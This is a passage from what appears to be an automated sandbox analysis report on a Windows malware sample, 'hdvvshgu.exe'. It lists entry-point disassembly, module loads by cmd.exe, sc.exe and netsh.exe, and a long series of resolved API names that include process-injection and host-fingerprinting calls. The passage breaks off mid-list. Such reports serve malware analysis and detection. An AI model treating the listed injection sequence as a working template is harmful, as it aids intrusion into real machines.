\"call\t0x401930,jmp\t0x401416,push\tebp,mov\tebp, esp,push\t0,call\tdword ptr [0x40c034],push\tdword ptr [ebp + 8],call\tdword ptr [0x40c030],push\t0xc0000409,call\tdword ptr [0x40c00c],push\teax,call\tdword ptr [0x40c038],pop\tebp,ret\t,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\t0x17,call\t0x40a716,test\teax, eax,je\t0x4015c9,push\t2,pop\tecx,int\t0x29,mov\tdword ptr [0x4146b0], eax,mov\tdword ptr [0x4146ac], ecx,mov\tdword ptr [0x4146a8], edx,mov\tdword ptr [0x4146a4], ebx,\"\n \"hdvvshgu.exe\" file has an entrypoint instructions - \"call\t0x401930,jmp\t0x401416,push\tebp,mov\tebp, esp,push\t0,call\tdword ptr [0x40c034],push\tdword ptr [ebp + 8],call\tdword ptr [0x40c030],push\t0xc0000409,call\tdword ptr [0x40c00c],push\teax,call\tdword ptr [0x40c038],pop\tebp,ret\t,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\t0x17,call\t0x40a716,test\teax, eax,je\t0x4015c9,push\t2,pop\tecx,int\t0x29,mov\tdword ptr [0x4146b0], eax,mov\tdword ptr [0x4146ac], ecx,mov\tdword ptr [0x4146a8], edx,mov\tdword ptr [0x4146a4], ebx,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77BF0000\n \"cmd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77BF0000\n \"sc.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77BF0000\n \"hdvvshgu.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77BF0000\n \"netsh.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77BF0000\n \"svchost.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77BF0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter GlobalAlloc (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter VirtualAlloc (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter Module32First (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter VirtualProtect (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter VirtualFree (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter TerminateProcess (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ExitProcess (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter SetErrorMode (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter StackWalk64 (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter GetVolumeInformationA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter GetComputerNameA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter GetSystemInfo (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter lstrcmpiA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter lstrlenA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter lstrcpynA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter InterlockedExchange (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter GetOverlappedResult (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter WaitForSingleObject (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter CreateFileA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter DisconnectNamedPipe (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter ConnectNamedPipe (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter CreateNamedPipeA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentVariableA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter DeleteFileA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter IsBadWritePtr (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter IsBadCodePtr (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter lstrcpyA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter lstrcmpA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter IsBadReadPtr (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter WriteProcessMemory (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter VirtualAllocEx (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter SetFileAttributesA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceA (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"GetProcAddress\" with a parameter GetWindowsDirectoryA 